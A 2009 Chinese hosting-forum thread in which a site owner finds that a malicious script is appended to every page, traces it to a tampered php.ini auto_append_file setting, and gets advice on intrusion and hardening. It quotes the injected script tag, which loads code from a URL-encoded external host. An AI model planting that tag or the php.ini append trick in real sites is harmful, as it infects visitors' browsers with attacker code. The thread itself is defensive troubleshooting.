最新遇到网站被挂马的情况

yw1015

访问网站页面都会在最后出现一行代码。网页源文件没有任何问题。
停止IIS6，再启动。然后就没有问题了。
这是什么原因造成的？？ARP吗？

firefox

基本是像是ARP的现象 :-)
做下绑定

yw1015

基本是像是ARP的现象 :-)
做下绑定
firefox 发表于 2009-3-11 16:36

今天又出现了这一状况。同时在时间查看器里看见有人在试ADMINISTRATOR的密码，已经换过名字。还出现SYSTEM账号LOGIN失败的记录。这是说明有人再试着进服务器吗？

在所有网页的最后一行会出现下面的代码（不要去运行）：

1. <script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>

复制代码

现在确定的是，一旦出现这个情况，只要停止IIS，然后把PHP.INI恢复（我是吧ZEND OPTIMIZER卸载了然后再装上）。然后就一切正常了。这是ARP攻击挂马吗？？

不好意思问一下，怎么绑定？？

yw1015

找到被挂马的地方了，对方直接是更改了PHP.INI文件。改了下面的东西：
; Automatically add files before or after any PHP document.
auto_prepend_file =
auto_append_file =C:\WINDOWS\system32\1028\t.php;

在t.php里面就是那段挂马代码。
请问对方是怎么做到的？？直接更改PHP.INI文件？？？？

firefox

入侵者能够修改php.ini!
肯定已经得到你服务器的至少是shell级权限了!
或者又有admin

检查网站及服务器漏洞,做好安全加固!

小胖子

今天又出现了这一状况。同时在时间查看器里看见有人在试ADMINISTRATOR的密码，已经换过名字。还出现SYSTEM账号LOGIN失败的记录。这是说明有人再试着进服务器吗？

在所有网页的最后一行会出现下面的代码（不要去运 ...
yw1015 发表于 2009-3-12 03:33

是入侵者用手工或工具尝试破解你的管理员帐号。
根据您提供的信息，应该是入侵者已经拿到了系统的权限，请您马上修补漏洞和做好安全加固。
关于ARP，你可以联系一下机房人员，让他们提供基于IP+Mac+Port的三项绑定。

yw1015

入侵者能够修改php.ini!
肯定已经得到你服务器的至少是shell级权限了!
或者又有admin

检查网站及服务器漏洞,做好安全加固!
firefox 发表于 2009-3-12 12:01

谢谢解答。
我上次遇到这样的情况，已经吧管理员密码和用户名等都换过了。过了大概一个星期，今天又被挂上了。还是一样的问题。真是愁死了。。。

小胖子

单纯的修改管理员和用户名密码是没有效果的，你要发现入侵者进入原因，然后把漏洞补上再做安全加固。
入侵者拿到系统的管理员权限，可以进入任何的操作如安装木马、Rootkit等。
找到根源，重做一下系统再安全加固吧。

beijingfix

网站所在目录权限设置不当，赶紧加固吧！